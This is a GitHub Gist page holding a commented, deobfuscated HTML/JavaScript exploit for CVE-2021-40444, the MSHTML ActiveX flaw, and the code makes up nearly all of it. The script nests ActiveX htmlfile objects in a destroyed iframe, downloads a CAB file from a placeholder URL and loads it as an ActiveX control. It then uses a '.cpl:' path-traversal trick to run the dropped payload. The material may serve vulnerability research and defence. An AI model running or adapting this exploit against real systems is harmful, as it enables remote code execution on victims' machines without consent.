Created
January 7, 2022 09:13
-
-
Save D4stiny/1692ded337b67bfbeea10f2269af81fe to your computer and use it in GitHub Desktop.
Deobfuscated HTML payload used in CVE-2021-40444 payload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <meta http-equiv="Expires" content="-1"> | |
| <meta http-equiv="X-UA-Compatible" content="IE=11"> | |
| </head> | |
| <body> | |
| <script> | |
| var exploit_cab = "[CAB file URL]"; | |
| function exploit() { | |
| // | |
| // Create an iframe element. | |
| // | |
| var iframe_element = document.createElement("iframe"); | |
| try { | |
| document.body.appendChild(iframe_element); | |
| } catch (err) { | |
| document.documentElement.appendChild(iframe_element); | |
| } | |
| // | |
| // Retrieve the ActiveXObject for the new iframe element. | |
| // | |
| var iframe_activex = iframe_element.contentWindow.ActiveXObject; | |
| var base_activex = new iframe_activex("htmlfile"); | |
| // | |
| // Initialize and destroy the iframe. | |
| // | |
| iframe_element.contentDocument.open().close(); | |
| try { | |
| document.body.removeChild(iframe_element); | |
| } catch (err) { | |
| document.documentElement.removeChild(iframe_element); | |
| } | |
| // | |
| // Initialize the destroyed iframe's ActiveX element. | |
| // | |
| base_activex.open().close(); | |
| // | |
| // Create a nested ActiveX object inside the destroyed iframe. | |
| // destroyed iframe -> | |
| // base ActiveX -> | |
| // (this element) nested ActiveX #1 | |
| // | |
| var activex_nested_1 = new base_activex.Script.ActiveXObject("htmlFile"); | |
| activex_nested_1.open().close(); | |
| // | |
| // Create another nested ActiveX object inside the previous nested object. | |
| // destroyed iframe -> | |
| // base ActiveX -> | |
| // nested ActiveX #1 -> | |
| // (this element) nested ActiveX #2 | |
| // | |
| var activex_nested_2 = new activex_nested_1.Script.ActiveXObject("htmlFile"); | |
| activex_nested_2.open().close(); | |
| // | |
| // Create another nested ActiveX object inside the previous nested object. | |
| // destroyed iframe -> | |
| // base ActiveX -> | |
| // nested ActiveX #1 -> | |
| // nested ActiveX #2 -> | |
| // (this element) nested ActiveX #3 | |
| // | |
| var activex_nested_3 = new activex_nested_2.Script.ActiveXObject("htmlFile"); | |
| activex_nested_3.open().close(); | |
| var cab_request = new XMLHttpRequest(); | |
| cab_request.open("GET", exploit_cab); | |
| cab_request.send(); | |
| activex_nested_3.Script.document.write("<body>"); | |
| var activex_control = activex_nested_3.Script.document.createElement("object"); | |
| // | |
| // https://docs.microsoft.com/en-us/cpp/mfc/upgrading-an-existing-activex-control?view=msvc-160#using-the-codebase-tag-with-a-cab-file | |
| // | |
| activex_control.setAttribute("codebase", exploit_cab + "#version=5,0,0,0"); | |
| activex_control.setAttribute("classid", "CLSID:deadbeef-cafe-babe-aaaa-deadbeeeeeef"); | |
| // | |
| // Trigger the CAB file as an ActiveX control. | |
| // | |
| activex_nested_3.Script.document.body.appendChild(activex_control); | |
| // | |
| // Launch the payload. | |
| // | |
| var payload_trigger = new ActiveXObject("htmlfile"); | |
| payload_trigger.Script.location = ".cpl:../../../AppData/Local/Temp/msword.inf"; | |
| } | |
| exploit(); | |
| </script> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment